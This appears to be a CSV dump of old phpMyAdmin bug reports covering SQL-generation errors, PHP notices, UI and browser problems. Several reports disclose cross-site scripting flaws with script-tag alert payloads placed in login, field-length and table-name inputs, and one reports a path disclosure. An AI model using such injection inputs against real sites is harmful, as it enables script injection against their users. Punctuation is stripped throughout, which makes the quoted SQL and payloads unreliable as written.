ehen defining a Primary key for a table, and you have duplicate entries in this column then, in the warning it gives me a button Show me duplicates I dont know the exact value of the button in english, i have the german Version, there its simply called Anzeigen Show me)) When i click on this button he shows me the duplicate entries.
But if a without quotes) is in this value he dont show me and the query is incorrect.
Example Double value foobar foo bar.net then the query only is SELECT FROM newsletteradressen WHERE email LIKE foobar foo ) LIMIT 0 , 30 And there are no reults.
I found this bug in Version phpMyAdmin 2.6.2 running with MySQL 4.0.22 on localhost.
Original URL https sourceforge.net p phpmyadmin bugs 1698 https sourceforge.net p phpmyadmin bugs 1698 Original author dominicforderer Found in version 2.6.4 pl2","bug"
"24444","8065","Missing `` in table and fieldname.
I have a table called `test test` I have a field that is unique.
If click Insert and insert an existing entry for the unique field, phpMyAdmin returns SQL query [Edit] INSERT INTO `test test` `ID` , `uniquefield` ) VALUES , duplicatevalue ) MySQL said [?]
1062 Duplicate entry duplicatevalue for key 2 Browse Click the Browse button and you ll find the query it returns for browsing is SELECT FROM test test WHERE uniquefield LIKE .co.in OR ID LIKE .co.in ) LIMIT 0 , 30 MySQL said [?]
1146 Table dbname.test doesn t exist The SQL statement after the browse has missing `` for table and fieldnames.
It tried to query from a table called test and not `test test` Thanks Anjanesh Lekshminarayanan Original URL https sourceforge.net p phpmyadmin bugs 1699 https sourceforge.net p phpmyadmin bugs 1699 Original author anjanesh Found in version 2.6.2 pl1","bug"
"24444","8066","Missing minutes from popup calander.
Having a DATTIME field and make an insert, using the Insert form.
Using the popup calendar to fill the DATETIME field, but the entered minutes doesnxc2x92t get passed from the popup to the data field.
Original URL https sourceforge.net p phpmyadmin bugs 1700 https sourceforge.net p phpmyadmin bugs 1700 Original author thingmand Found in version 2.6.3 rc1","bug"
"24444","8067","Copying a db containing a MERGE table.
I had to move a database which contains a merge table, however the copy process failed as phpMyAdmin tried to insert elements from the old table to the new one.
So, when encountering a MRG MyISAM table, phpMyAdmin should not copy export the content of the table.
Original URL https sourceforge.net p phpmyadmin bugs 1701 https sourceforge.net p phpmyadmin bugs 1701 Original author upsilon Found in version 2.6.1","bug"
"24444","8068","Create table query Undefined variable.
When running query below I get a PHP error =QUERY= create table registry key varchar 255) not null, value varchar 255) not null, primary key key) ); =ERROR= Error type Php Notice Message Undefined variable current identifier Trace 3 [show details] [hide details] pma sqp analyze ) FILE sqlparser.lib.php LINE 1631 DIR d \public html\dev\mysql\libraries pma sqp analyze ...) FILE sql.php LINE 105 DIR d \public html\dev\mysql require string[32]d \public html\dev\mysql\sql.php) FILE read dump.php LINE 258 DIR d \public html\dev\mysql Original URL https sourceforge.net p phpmyadmin bugs 1702 https sourceforge.net p phpmyadmin bugs 1702 Original author cagret Found in version 2.6.2 pl1","bug"
"24444","8069","Fatal error in config file leads to empty page.
PHP version 5.0.4 phpMyAdmin version 2.6.3 rc1 phpMyAdmin at least version 2.6.3 rc1) disables error reporting while reading the config.inc.php.
This was probably done to prevent information disclosures, and there is code afterward to report errors in the include...except that code will never be called unless given a blank or missing config.inc.php.
If config.inc.php has a parse error, the user is presented with a completely empty page The parse error is fatal, but no message is printed, neither to the browser nor to the server s error log, because error reporting is turned off.
This behavior clearly violates the Principle of Least Surprise.
A non trivial, but effective solution would be to register a custom error handler before including the config file, so that the installing user can at least be alerted that the problem is in their configuration file, not in phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 1703 https sourceforge.net p phpmyadmin bugs 1703 Original author electronerd Found in version 2.6.3 rc1","bug"
"24444","8070","Internet Explorer JS bugs.
when u want export database with IE u get JS error, and no export is maded.
First warrning i getting in js function mouseMove e) on line x = event.x plusX; My JS debuger says Error A Runtime Error has occurred.
Do you wish to Debug?
Line 141 Error Object required Yes No Original URL https sourceforge.net p phpmyadmin bugs 1704 https sourceforge.net p phpmyadmin bugs 1704 Original author vaidas Found in version Latest Git","bug"
"24444","8071","Incorrect Message Display.
1.Select existing database 2.Click on Drop Button 3.Click on No Incorrect message databases have been dropped successfully is displayed.
Original URL https sourceforge.net p phpmyadmin bugs 1705 https sourceforge.net p phpmyadmin bugs 1705 Original author nooruddin Found in version 2.6.1 pl3","bug"
"24444","8072","Cannot change table s collation.
Using the following PHP 5.0.4 MySQL 5.0.4b Apache 2.0.52 phpMyAdmin 2.6.3 rc1 1) I click on Operations for any given table.
2) I select latin1 bin from the Collation dropdown menu, changing it from the current latin1 swedish ci .
3) I click submit to save the change, but the SQL that is generated is regardless of the collation I choose) ALTER TABLE `Listing` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci Original URL https sourceforge.net p phpmyadmin bugs 1706 https sourceforge.net p phpmyadmin bugs 1706 Original author cholmon Found in version 2.6.3 rc1","bug"
"24444","8073","Ambiguity in Database Names.
1.Click on Databases link in the right pane of the Homepage 2.Enter New Database name as Sales 3.Click on Create Button 4.Enter Same Database name Sales Preceding with one space 5.Click on Create Button 6.Enter Same Database name Sales Preceding With two spaces 6.Click on Create Button... Like this it s continuously creating databases with same name as Sales , this leads to Ambiguity.
The environment details is OS Windows XP Professional phpMyAdmin phpMyAdmin 2.6.1 pl3 Browser IE 6.0.2 Note May be the problem with the Textbox validation.
Trim) Original URL https sourceforge.net p phpmyadmin bugs 1707 https sourceforge.net p phpmyadmin bugs 1707 Original author nooruddin Found in version 2.6.1 pl3","bug"
"24444","8074","Accepting Negative values in Resource Limits.
1) Click on Privileges link in the Right Pane of the Home Page 2) In the User overview page, Click on Add a new User link 3) Enter the value Satish in the User name text box against Use text field option 4) Select Local option for the Host textbox and the value localhost should be displayed in the textbox.
5) Select No Password option for the Password textbox and donot enter any value in the textbox.
6) Donot enter any value in the Re type textbox.
7) In the Resource limits , Enter the value 1 or any negative value) in the Max Queries per hour , MAX UPDATES PER HOUR , MAX CONNECTIONS PER HOUR Textboxes.
8) Click on Go button.
9) The query is getting executed successfully and displaying some junk value 4294967295 in the Max Queries per hour , MAX UPDATES PER HOUR , MAX CONNECTIONS PER HOUR Textboxes.
The environment details OS Windows XP Professional phpMyAdmin phpMyAdmin 2.6.1 pl3 Browser IE 6.0.2 Original URL https sourceforge.net p phpmyadmin bugs 1708 https sourceforge.net p phpmyadmin bugs 1708 Original author psvarma Found in version 2.6.1 pl3","bug"
"24444","8075","cannot rename db.
since 2.6.3 rc1 Original URL https sourceforge.net p phpmyadmin bugs 1709 https sourceforge.net p phpmyadmin bugs 1709 Original author lem9","bug"
"24444","8076","cannot export desired data.
details phpMyAdmin 2.6.1 pl3 MySQL 4.0.15 standard I m trying to export some simple data from a table My SQL script requires setting of variables e.g.
Start SQL Script to retrieve desired data set runningTotal = 0; set seq = 0; select orderid, date, total, runningTotal = runningTotal total as MTD Total, seq = seq 1 as OrderSequenceID from order table; End SQL Script to retrieve desired data After executing this script, the data I want to export is displayed correctly HOWEVER, when I click on the Export link, the SQL is re written dropping the first two set statements and when I export, the MTD Total and OrderSequenceID columns are both NULL for all records returned!
Very frustrating I ve tried everything to find a work around but, the script is always over written.
Thanks in advance to whomever takes on this fix!
Original URL https sourceforge.net p phpmyadmin bugs 1710 https sourceforge.net p phpmyadmin bugs 1710 Original author cartman79","bug"
"24444","8077","Unsaved relations lost when changing display field.
If your are in the relation view of a table and do some changes in the upper section Links to and than change the setting of Choose field to display , all your changes in the upper section get lost.
These changes should either be saved or a warning should appear about that.
Configuration Server IIS 5.1 Win XP SP 2); MySQL 4.1.12 nt running on localhost) Client IE 6.0 on Win XP SP 2 Original URL https sourceforge.net p phpmyadmin bugs 1711 https sourceforge.net p phpmyadmin bugs 1711 Original author pkordowich Found in version 2.6.3 rc1","bug"
"24444","8078","Creating a table under MySQL 5.x with wrong type.
When creating new table with php and mysql 5.0.4) and U want that new table will be InnoDB, phpMyAdmin creates always MyISAM table.
Now U must chnage table type always when U have created new table... WIZ Original URL https sourceforge.net p phpmyadmin bugs 1712 https sourceforge.net p phpmyadmin bugs 1712 Original author masterwiz Found in version 2.6.3 rc1","bug"
"24444","8079","db rename and old pmadb information.
Since this is my first post.. i am not sure if this topic should go here or somewhere else.. anyway.. i certainly hope this problem is somewhat related to this category.
I am using phpMyAdmin v2.6.2 stable release).. and i have set all of other bookmark, history, relation etc.
tables in the config file and all of them are working fine.
Now i have created many queries and bookmarked them which by default are stored in my bookmarks table.
But later when i rename any database.. the bookmark table doesn t get updated.
I think when doing such kind of renaming the bookmark and other tables should as well get updated.. else i wont see my bookmarked queries again.
As of now i am updating the bookmark table manually.
I hope this change isnt gonna be of much big effort.. =Vasu= Original URL https sourceforge.net p phpmyadmin bugs 1713 https sourceforge.net p phpmyadmin bugs 1713 Original author g srinivas Found in version 2.6.2 rc1","bug"
"24444","8080","bullet points indentation not right under IE in the doc).
Greetings.
There seems to be a bug in the way IE version 6.0.2800 at least) lays out unordered lists.
The bullet points do not indent.
It does indent under Firefox.
See the attached screenshots if you d like.
Problem occurs with current CVS code.
Original URL https sourceforge.net p phpmyadmin bugs 1714 https sourceforge.net p phpmyadmin bugs 1714 Original author ibennetch Found in version Latest Git","bug"
"24444","8081","Query Window does not open in new window.
When the Query WIndow icon on the left frame is clicked the icon with SQL on it), it opens in that frame and not a new window like it should.
This seems to happen on both IE 6 and Firefox 1.0.4. see screenshot) However, sometimes it works and opens in a new window, this often happens if Firefox is left for about 10 15 seconds before clicking.
I am using PMA 2.6.3, cookie auth) PHP 5.0.4 with Zend Studio Debugger v4.0.0 and Zend Optimizer v2.5.10 Apache 2.0.54 on Windows XP SP2 Original URL https sourceforge.net p phpmyadmin bugs 1715 https sourceforge.net p phpmyadmin bugs 1715 Original author tc1415 Found in version 2.6.3","bug"
"24444","8082","Commands out of sync with mysqli).
I ve just installed phpMyAdmin 2.6.3.
When I access any table, I get the error message SQL Befehl [Bearbeiten] SHOW KEYS FROM `tablename` ; MySQL meldet 2014 Commands out of sync; you can t run this command now I m using MySQL 4.1.12 nt on Windows XP SP 1 but it must be caused by the new pma release.
All versions of pma that I ve used before didn t bring that error.
Original URL https sourceforge.net p phpmyadmin bugs 1716 https sourceforge.net p phpmyadmin bugs 1716 Original author mpopp75 Found in version 2.6.3","bug"
"24444","8083","Wrong tooltip text for collation.
The tooltip text for the icon in front of MySQL connection collation on the main page is wrong.
It should be the message strMySQLConnectionCollation instead of strMySQLCharset.
Line 628 in main.php v 2.70).
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 1717 https sourceforge.net p phpmyadmin bugs 1717 Original author bjornth Found in version 2.6.3","bug"
"24444","8084","Delete row forgets Full Texts status.
brows a table, click on Full Texts , then delete a row gt; Partial Texts will be displayed.
Original URL https sourceforge.net p phpmyadmin bugs 1718 https sourceforge.net p phpmyadmin bugs 1718 Original author em gotcha Found in version 2.6.3 pl1","bug"
"24444","8085","Search doesn t work with MySQL 5.0.7.
With phpMyAdmin 2.6.3 pl1, when I access a database and enter the menu item search , enter any value for Search in database and submit I get the error message SQL query [Edit] SELECT COUNT ) AS count FROM `database`.`table` WHERE `id` LIKE CONVERT utf8 searchstring USING ) COLLATE OR `col1` LIKE CONVERT utf8 searchstring USING ) COLLATE OR `col2` LIKE CONVERT utf8 searchstring USING ) COLLATE OR `timestamp` LIKE CONVERT utf8 searchstring USING ) COLLATE MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) COLLATE OR `col1` LIKE CONVERT utf8 searchstring USING ) COLLATE OR `bew` LIK at line 1 This works fine with MySQL 4, but not with MySQL 5.0.
7\.
Markus Popp Original URL https sourceforge.net p phpmyadmin bugs 1719 https sourceforge.net p phpmyadmin bugs 1719 Original author mpopp75 Found in version 2.6.3 pl1","bug"
"24444","8086","invalid normal cursor style.
In function setPointer of file libraries functions.js at line 458, you use the value normal for the cursor CSS attribute when it should be default at least for IE).
cf.
http msdn.microsoft.com workshop author dhtml referen ce properties cursor.asp) This leads to a request on the server for a cursor file named normal , which of course doesn t exists in the pma distribution.
Original URL https sourceforge.net p phpmyadmin bugs 1720 https sourceforge.net p phpmyadmin bugs 1720 Original author lbcleblanc Found in version 2.6.3 pl1","bug"
"24444","8087","Minor theme text color issue.
server Mandrake Linux 9.2, MySQL v4.0.15, PHP v4.3.3, phpMyAdmin v2.6.3 pl1 client Windows 2000, both Firefox 1.0.4 and IE 6 SP1 Using the darkblue orange theme, in the Query page for a database, the first column constituting the row descriptors Field , Sort , Show , etc.)
is showing as black text on a darkblue background.
This text is hard to read.
Original URL https sourceforge.net p phpmyadmin bugs 1721 https sourceforge.net p phpmyadmin bugs 1721 Original author smagruder","bug"
"24444","8088","Can t change themes under Firefox.
server Mandrake Linux 9.2, MySQL v4.0.15, PHP v4.3.3, phpMyAdmin v2.6.3 pl1 client Windows 2000, both Firefox 1.0.4 On the phpMyAdmin home page, when clicking the Theme Style combobox to change to another theme, pma refreshes, but the theme doesn t change.
I was trying to change from darkblue orange back to the original theme.
When I try with using IE SP1 and the other client server versions the same, theme changing works.
This seems to be a new issue, as I ve been able to change themes under Firefox at an earlier time.
Original URL https sourceforge.net p phpmyadmin bugs 1722 https sourceforge.net p phpmyadmin bugs 1722 Original author smagruder Found in version 2.6.3 pl1","bug"
"24444","8089","display tbl.lib.php Undefined variable order img.
Notice Undefined variable order img in usr local cpanel base 3rdparty phpMyAdmin libraries display tbl.lib.php on line 837 Table structure for table `tempOrder` CREATE TABLE tempOrder lineID int 11) NOT NULL auto increment, sessionID char 32) NOT NULL default , catString char 255) NOT NULL default , partNo char 15) NOT NULL default , partDesc char 31) NOT NULL default , price double 8,2) NOT NULL default 0.00 , qtyOrdered tinyint 3) NOT NULL default 0 , PRIMARY KEY lineID), KEY sessionID sessionID) ) TYPE=MyISAM; SELECT `price` FROM `tempOrder` ORDER BY `price` Original URL https sourceforge.net p phpmyadmin bugs 1723 https sourceforge.net p phpmyadmin bugs 1723 Original author jjpopek Found in version 2.6.1 rc1","bug"
"24444","8090","file location disclosure on errors with 2.6.2 and 2.6.3.
The file of libraries select lang.lib.php on both 2.6.2 and 2.6.3 errors and discloses the path of the installed phpmyadmin application Original URL https sourceforge.net p phpmyadmin bugs 1724 https sourceforge.net p phpmyadmin bugs 1724 Original author sipma","bug"
"24444","8091","...WHERE NOT isnull MYFIELD) fails.
The query SELECT FROM `MYTABLE` WHERE NOT isnull MYFIELD) returns an error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near FAX ) LIMIT 0, 30 at line 1 If i cut n paste the query SELECT FROM `MYTABLE` WHERE NOT isnull MYFIELD ) LIMIT 0 , 30 returned by read dump.php with the error it works fine.
If I submit the original query using the command line mysql client it works.
If I submit the query using the phpMyAdmin I am upgrading from phpMyAdmin 2.6.1) it works.
using versions MySQL server 4.1.7 0 php mysql 4.3.8 2.1 Fedora Core release 2 Tettnang) phpMyAdmin 2.6.3 pl1 Original URL https sourceforge.net p phpmyadmin bugs 1725 https sourceforge.net p phpmyadmin bugs 1725 Original author ckjackson Found in version 2.6.3 pl1","bug"
"24444","8092","table dot numeric field name.
CREATE TABLE `thetable` `2` varchar 12) NOT NULL default ) ENGINE=MyISAM DEFAULT CHARSET=latin1; mysql gt; select thetable.2 from thetable; | 2 | | aaaa | 1 row in set 0.00 sec) But it fails in phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 1726 https sourceforge.net p phpmyadmin bugs 1726 Original author lem9 Found in version 2.6.3 pl1","bug"
"24444","8093","DEFAULT CURRENT TIMESTAMP added incorrectly.
Creating a table I get this following wrong error message, adding a DEFAULT CURRENT TIMESTAMP to an integer field CREATE TABLE `tt` `id` INT DEFAULT CURRENT TIMESTAMP NOT NULL , `text` VARCHAR 50 ) NOT NULL ) TYPE = MYISAM MySQL said 1067 Invalid default value for id When I submit the form for a second time, it works correctly.
A side effect is, that the chosen table type is set back to the default value.
If the default is InnoDB, I submit the create table form using MyISAM and get the error message, the table type is set back to InnoDB.
Submitting the form a second time when creating the table works, it creates the table as InnoDB, if I forget to put it back to MyISAM.
Besides the wrong error message, I think, whenever an error message appears, the original values should be put into the form.
The 3 screenshots I ve added document the whole procedure.
Original URL https sourceforge.net p phpmyadmin bugs 1727 https sourceforge.net p phpmyadmin bugs 1727 Original author mpopp75 Found in version 2.6.3 pl1","bug"
"24444","8094","theme aqua brushed missing file.
When using IE6 and viewing table structure browsing table the following errors appear in Apache log file [Sun Jul 17 21 03 53 2005] [error] [client 172.20.208.14] File does not exist srv www htdocs pma normal, referer http 172.17.28.168 pma tbl properties structure.php?lang=en utf 8 server=1 collation connection=utf8 general ci db=mydb table=mytable [Sun Jul 17 21 11 17 2005] [error] [client 172.20.208.14] File does not exist srv www htdocs pma normal, referer http 172.17.28.168 pma read dump.php In other words there is a reference to a file directory called normal which does not exist.
This does not happen under Firefox.
In addition, when using the Aqua Brushed theme with any browser, the following error appears when loading any pma page [Sun Jul 17 21 03 59 2005] [error] [client 172.20.208.14] File does not exist srv www htdocs pma css themes, referer http 172.17.28.168 pma main.php?lang=en utf 8 server=1 collation connection=utf8 general ci Original URL https sourceforge.net p phpmyadmin bugs 1728 https sourceforge.net p phpmyadmin bugs 1728 Original author unclef Found in version 2.6.3 pl1","bug"
"24444","8095","XSS in cookie login.
XSS when using somethin like this as Username gt; lt;script gt;alert Test ); lt; script gt; Original URL https sourceforge.net p phpmyadmin bugs 1729 https sourceforge.net p phpmyadmin bugs 1729 Original author andkerber Found in version 2.6.3 pl1","bug"
"24444","8096","UPPER ).
SELECT uid FROM user list WHERE UPPER login) = UPPER CSMITH ) gives a syntax error.
Original URL https sourceforge.net p phpmyadmin bugs 1730 https sourceforge.net p phpmyadmin bugs 1730 Original author lem9","bug"
"24444","8097","Show All doesn t work browse foreign values).
When setting the cfg[ ShowAll ] directive to TRUE, pressing the Show All button shows an empty set of results, rather than the full set of results.
This was working on phpmyadmin 2.5.7 pl1 with MySQL 4.1.11.
Original URL https sourceforge.net p phpmyadmin bugs 1731 https sourceforge.net p phpmyadmin bugs 1731 Original author hspirit Found in version 2.6.3 pl1","bug"
"24444","8098","pma reload navigation not found mysqli).
phpmyamin version 2.6.3 pl1.
Bug happened with latest CVS as well.
Did not try with earlier versions.
OS fedora core 4 x86 64 PHP 5.0.4 x86 64 compiled with mysql and mysqli support from rpm source on fedora4 updates) Mysql 4.1.13 x86 64 AMD64 rpm from mysql.com) When configuring phpmyadmin to use the mysqli extension, I get the following php error Fatal error Call to undefined function pma reloadnavigation ) in home web phpMyAdmin header.inc.php on line 135 The problem occurs with any auth type chosen.
Everything works well using the older mysql extension.
I was able to track the problem down to line 115 in file mysqli.dbi.lib.php mysqli query link, query, method) returns false, even though the query has no problem when I enter it on a command line SELECT VERSION ) AS version).
Now, I am not really sure it is really a phpmyadmin but rather a mysqli extension bug.
All looks like the mysqli query ) function returns false if given a third parameter result mode).
Changing the above line from return mysqli query link, query, method) to mysqli query link, query) fixes the problem but is of course not an acceptable solution on the long run.
Original URL https sourceforge.net p phpmyadmin bugs 1732 https sourceforge.net p phpmyadmin bugs 1732 Original author zeitoun Found in version 2.6.3 pl1","bug"
"24444","8099","Warning on cfg[ ThemeManager ] = false;.
I see this error when cfg[ ThemeManager ] = false; Warning asort ) expects parameter 1 to be array, null given in D \jenik\www\temp\admin\libraries\select theme.lib.php on line 80 this is like bug 991887 i think) ... server PHP4 5, MySQL 4.0.x 20 24), Win Original URL https sourceforge.net p phpmyadmin bugs 1733 https sourceforge.net p phpmyadmin bugs 1733 Original author jenix Found in version Latest Git","bug"
"24444","8100","Notice on Database list.
on Database list is next notice `visible` Notice Undefined variable mysql cur user in D \jenik\www\temp\admin\libraries\check user privileges.lib.php on line 67 I see this notice on other place too, but don t know where ... PMA snapshot 2005 07 24 Server PHP4 5, MySQL 4.0.x, Win Original URL https sourceforge.net p phpmyadmin bugs 1734 https sourceforge.net p phpmyadmin bugs 1734 Original author jenix Found in version Latest Git","bug"
"24444","8101","JS doesn t working correctly on SQL history.
When I want to edit or exec) sql query from history in QueryWindow, query win is refreshed to index.php ...
This is only for multi line query.
PMA snapshot 2005 07 24 Thanx.
Original URL https sourceforge.net p phpmyadmin bugs 1735 https sourceforge.net p phpmyadmin bugs 1735 Original author jenix Found in version 2.6.4 pl2","bug"
"24444","8102","Browse icon alt tag on LHS updates.
When inserted records the alt tag on the browse icon on the left side list of tables does not update the number of rows in the table.
When rows are deleted, or the table emptied, the alt tag on the browse icon and on the table name both do not update.
Windows XP SP2 Apache 2.0.54 PHP 4.4.0 MySQL 4.1.13 PMA 2.6.3pl1 Original URL https sourceforge.net p phpmyadmin bugs 1736 https sourceforge.net p phpmyadmin bugs 1736 Original author qpchan Found in version 2.6.4 rc1","bug"
"24444","8103","MySQL documentation link.
From my mailbox, at least I hope this is related to phpMyAdmin, there is no mention of project ).
Can somebody verify that we don t do this?
I can t see it in my Firefox, however it s configured a bit far away from default settings.)
Subject mysql documentation website design The mysql documentation link pops up a window without a forward or backward button, and does not update the url as you move about.
The result is you can t at least, not easily) bookmark a page or save a url to forward to someone else.
Bad idea.
Kelly Original URL https sourceforge.net p phpmyadmin bugs 1737 https sourceforge.net p phpmyadmin bugs 1737 Original author nijel","bug"
"24444","8104","Schema creation not stable.
Hi, when creating the schema in IE ver 6.02 an error is displayed showing that the file type .ftf can t be opened by adobe and the screen closes.
However, if I open it in Firefox, adobe loads the pdf that has been created.
The actual pdf that gets created is of not much use at present.
The scaling that is done makes the document so small and unusable.
I am trying to use a DB with 20 or so tables and it just can t handle the structure.
Also, not sure what the point of having the scratch pad and laying the tables out if the scaling is automatically done.
I think this is a great idea, and is very valuable for AP s and their DB design.
I can only hope these bugs will be ironed out sometime soon!
Cheers Egon Original URL https sourceforge.net p phpmyadmin bugs 1738 https sourceforge.net p phpmyadmin bugs 1738 Original author egon1 Found in version 2.6.2 pl1","bug"
"24444","8105","Incorrect You should define a primary key .
In some cases, this message is issued incorrectly when browsing a table, instead of showing a Delete button.
For example with this table CREATE TABLE accounts import `Action` enum , INSERT , REPLACE , UPDATE , DELETE , Error ) NOT NULL default , `ImportDate` date NOT NULL default 0000 00 00 , `ProcessDate` date NOT NULL default 0000 00 00 , `SourceScript` enum , CSSI , ESGI , INTELI ) NOT NULL default , `SourceFile` varchar 64) NOT NULL default , Account varchar 15) NOT NULL default , Utility enum , Niagara Mohawk 006994735) , NYSEG 006977763) , ConEd 006982359) , Error ) NOT NULL default , `Status` enum , INITIALIZED , ACCEPTANCE , REJECTED , PENDING , DROPPED , WAITING ENROLLMENT , WAITING DROP , WAITING CHANGE , SENT ENROLLMENT , SENT DROP , SENT CHANGE , Error ) NOT NULL default , StatusDate date NOT NULL default 0000 00 00 , Customer varchar 64) NOT NULL default , AuthorizingPerson varchar 64) NOT NULL default , Title varchar 32) NOT NULL default , Phone varchar 32) NOT NULL default , Fax varchar 32) NOT NULL default , Email varchar 32) NOT NULL default , ServiceAddress varchar 128) NOT NULL default , ServiceCity varchar 64) NOT NULL default , ServiceState varchar 16) NOT NULL default , ServiceZip varchar 16) NOT NULL default , BillingName varchar 64) NOT NULL default , BillingAddress varchar 128) NOT NULL default , BillingCity varchar 64) NOT NULL default , BillingState varchar 16) NOT NULL default , BillingZip varchar 16) NOT NULL default , UtyAddress1 varchar 128) NOT NULL default , UtyAddress2 varchar 128) NOT NULL default , UtyCity varchar 64) NOT NULL default , UtyState varchar 16) NOT NULL default , UtyZip varchar 16) NOT NULL default , TaxExempt enum , F , T , Error ) NOT NULL default , TaxExemptNo varchar 20) NOT NULL default , Ptid mediumint 8) unsigned NOT NULL default 0 , PtidString varchar 32) NOT NULL default , RateClass enum , SC1 , SC1B , SC1C , SC2 , SC2D , SC3 , SC3A , SC3T D , Error ) NOT NULL default , LoadProfile varchar 99) NOT NULL default , AccountType enum , R , L , Error ) NOT NULL default , Program smallint 5) unsigned NOT NULL default 0 , PricingGroup varchar 2) NOT NULL default , Cost float NOT NULL default 0 , Demand float NOT NULL default 0 , Kwh mediumint 7) unsigned NOT NULL default 0 , SalesGroup enum , CSS , NA , Error ) NOT NULL default , SalesPerson varchar 32) NOT NULL default , Commission decimal 5,2) NOT NULL default 0.00 , CommissionRate float NOT NULL default 0 , SignupDate date NOT NULL default 0000 00 00 , BatchDate date NOT NULL default 0000 00 00 , WelcomeDate date NOT NULL default 0000 00 00 , WelcomeFailDate date NOT NULL default 0000 00 00 , WelcomeResentDate date NOT NULL default 0000 00 00 , EffectiveDate date NOT NULL default 0000 00 00 , UtyActiveDate date NOT NULL default 0000 00 00 , EndDate date NOT NULL default 0000 00 00 , EndReason tinytext NOT NULL, `248 Date` date NOT NULL default 0000 00 00 , `568 Date` date NOT NULL default 0000 00 00 , `810 Date` date NOT NULL default 0000 00 00 , `814 ReqDate` date NOT NULL default 0000 00 00 , `814 ResDate` date NOT NULL default 0000 00 00 , `867 Date` date NOT NULL default 0000 00 00 , PRIMARY KEY `Account`,`Utility`,`ProcessDate`,`SourceScript`,`SourceFile`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; Original URL https sourceforge.net p phpmyadmin bugs 1739 https sourceforge.net p phpmyadmin bugs 1739 Original author lem9 Found in version 2.6.3 pl1","bug"
"24444","8106","SELECTing explicit numeric values.
When selecting a constant integer, one results column can be replaced by that integer.
Given that the result columns are indexed from 0, if you select an integer to be a column with an index greater than that integer, the data in the column with the index of that integer is replaced by that integer though the column heading is intact).
Eg SELECT alice , bob , carol , 1 phpMyAdmin will return the values alice, 1, carol, 1 and SELECT alice , bob , carol , 2 results in alice, bob, 2, 2 but SELECT 1, alice , bob , carol correctly results in 1, alice , bob , carol Server phpMyAdmin 2.5.4 php 4.3.8 MySQL 4.0.20 Apache 1.3.31 Opera 7.54 Original URL https sourceforge.net p phpmyadmin bugs 1743 https sourceforge.net p phpmyadmin bugs 1743 Original author raumkraut Found in version 2.5.4","bug"
"24444","8107","Various errors when arg separator.input = ; .
When arg separator.input = ; there are several errors.
The most obvious is that it is impossible to select a database due to db details structure.php dosnt think it has recived any paramenters whatsoever.
Error db details structure.php Missing parameter db FAQ 2.8) This can be esaily fixed with arg separator.input = ; I think this should be pointed out in the documentation.
I would also like to draw your attention to http www.w3.org QA 2005 04 php session Original URL https sourceforge.net p phpmyadmin bugs 1740 https sourceforge.net p phpmyadmin bugs 1740 Original author tc1415 Found in version 2.6.3 pl1","bug"
"24444","8108","XSS vulnerability on Create table page.
1\.
Create table Name qwer Fields 1 2\.
On the next page, specify Field qwe Type TINYINT Length Values gt; lt;script gt;alert XSS ); lt; script gt; there is one double quotation mark at the beginning) 2\.
Click Save button.
The XSS alert window appears.
This is a cross site scripting XSS) vulnerability.
Original URL https sourceforge.net p phpmyadmin bugs 1741 https sourceforge.net p phpmyadmin bugs 1741 Original author feldgendler Found in version 2.6.3 pl1","bug"
"24444","8109","msing paramter after following back link.
doing an sql query qhich results in a sql syntax error displays an error message with back link following this back link produces db details.php Missing parameter db FAQ 2.8) phpMyAdmin cvs 2005 08 01 Windows XP SP2 Firefox 1.0.6 MySQL 5.0.4 beta nt PHP 4.3.9 Original URL https sourceforge.net p phpmyadmin bugs 1742 https sourceforge.net p phpmyadmin bugs 1742 Original author cybot tm Found in version Latest Git","bug"
"24444","8110","XSS vulnerability on table creation page.
Create table Name lt; script gt; lt;script gt;alert xss ); lt; script gt; Fields 1 Clicking GO gives corresponding xss ) JS allert window.This is a cross site scripting XSS) vulnerability.
Original URL https sourceforge.net p phpmyadmin bugs 1744 https sourceforge.net p phpmyadmin bugs 1744 Original author vkassenbaev Found in version 2.6.3 pl1","bug"
"24444","8111","Parsing of float constant.
Environment phpMyAdmin 2.6.3 pl1 MySQL 4.1.13 standard log PHP Version 4.4.0 .
configure with openssl= usr enable memory limit with mysql with zlib with apache=.. apache 1.3.33 enable inline optimization with curl= usr local with mcrypt= usr local Linux 2.4.20 31.9 Details This query runs fine in mysql command line SELECT vip autoship.
, products.sku, products.additional discount, products.description, products.Apex price as club regular price, sum products.Apex price 70 .01) ) as item total with discount, sum vip autoship.quantity products.Apex price 70 .01) ) ) as subtotal with discount, sum products.Apex price vip autoship.quantity ) sum vip autoship.quantity products.Apex price 70 .01 ) ) ) ) AS total savings, DATE FORMAT vip autoship.delay until date, M Y ) as item delayed date, IF vip autoship.delay until date gt; NOW ), greater , less ) AS delay until, DATE FORMAT products.additional discount end, M d, Y ) as discount end formatted, IF products.additional discount start lt;= NOW ), good , bad ) AS discount start check, IF products.additional discount end gt;= NOW ), good , bad ) AS discount end check FROM vip autoship LEFT JOIN products on vip autoship.sku = products.sku WHERE username = mrblonde GROUP BY vip autoship.sku But breaks when run through phpmyadmin with this error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 01 ) ) as item total with discount , sum vip autoship .
quanti Changing .01 to 1 allows the query to run through phpmyadmin, but of course breaks the query logic.
Original URL https sourceforge.net p phpmyadmin bugs 1745 https sourceforge.net p phpmyadmin bugs 1745 Original author caffeinejolt Found in version 2.6.3 pl1","bug"
"24444","8112","Request URI Too Large on Edit, Explain....
According to the CHANGELOG, on 2005 07 12, Marc fixed Insert Row and Export so that they use POST when the query is too large to send it via GET.
Thanks so much!
This is just what I needed today.
There s still a related problem though if I execute such a large query, I can t use the Edit, Explain SQL, Create PHP Code or Refresh links either, nor can I click the column headers to re sort; these all generate a Request URI Too Large error.
The Edit, Explain, Create and Refresh links could also use POST in these cases.
For the column headers, that s gonna look ugly, but I m not sure how else to make it work... Wasn t there a plan to start using a PHP session in phpMyAdmin?
That would be a good solution here write the query into the session and give it an ID; then just pass that ID in the Edit, Explain, Create, Refresh, Export, and column header links.
That would probably be a fairly major architectural change though.
Original URL https sourceforge.net p phpmyadmin bugs 1746 https sourceforge.net p phpmyadmin bugs 1746 Original author ryandesign Found in version Latest Git","bug"
